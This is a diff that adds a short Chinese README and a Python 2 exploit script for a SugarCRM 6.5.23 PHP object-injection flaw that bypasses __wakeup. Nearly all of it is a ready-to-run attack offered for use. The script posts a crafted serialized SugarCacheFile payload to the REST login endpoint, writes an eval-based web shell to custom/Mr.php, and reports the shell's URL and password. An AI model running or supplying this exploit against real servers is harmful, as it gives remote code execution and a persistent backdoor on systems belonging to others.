sugarCRM

CMS/sugarCRM/sugarCRM_v6.5.23/README.md

@@ -0,0 +1 @@
+sugarCRM v6.5.23 反序列化漏洞(对象注入漏洞)绕过__wakeup 影响版本 SugarCRM <= 6.5.23 PHP5 < 5.6.25 PHP7 < 7.0.10 

CMS/sugarCRM/sugarCRM_v6.5.23/sugarCRM_v6.5.23_exp.py

@@ -0,0 +1,28 @@
+#coding = utf8
+
+#sugarCRM ver 6.5.23  
+
+#Usage : python xxx.py url  
+
+#author : Mr5m1th
+import requests as req
+import sys
+def exploit(url):
+	exp_url = url + "/service/v4/rest.php"
+ 	print "[*]exploit_url:"+exp_url
+	data = {
+	    'method': 'login',
+	    'input_type': 'Serialize',
+	    'rest_data': 'O:+14:"SugarCacheFile":23:{S:17:"\\00*\\00_cacheFileName";s:16:"../custom/Mr.php";S:16:"\\00*\\00_cacheChanged";b:1;S:14:"\\00*\\00_localStore";a:1:{i:0;s:29:"<?php eval($_POST[\'HHH\']); ?>";}}',
+	}
+	try:
+ 		req.post(exp_url, data=data)
+ 	except:
+ 		print "[-]:error occured!";
+if __name__ == '__main__':
+ 	main_url = sys.argv[1]
+ 	exploit(main_url)
+ 	if req.get(main_url+"/custom/Mr.php").status_code==200:
+  		print "[*]exploit_success!shell:   "+main_url+"custom/Mr.php"+"   "+"password:HHH"
+ 	else:
+ 		print "[-]exploit fail!"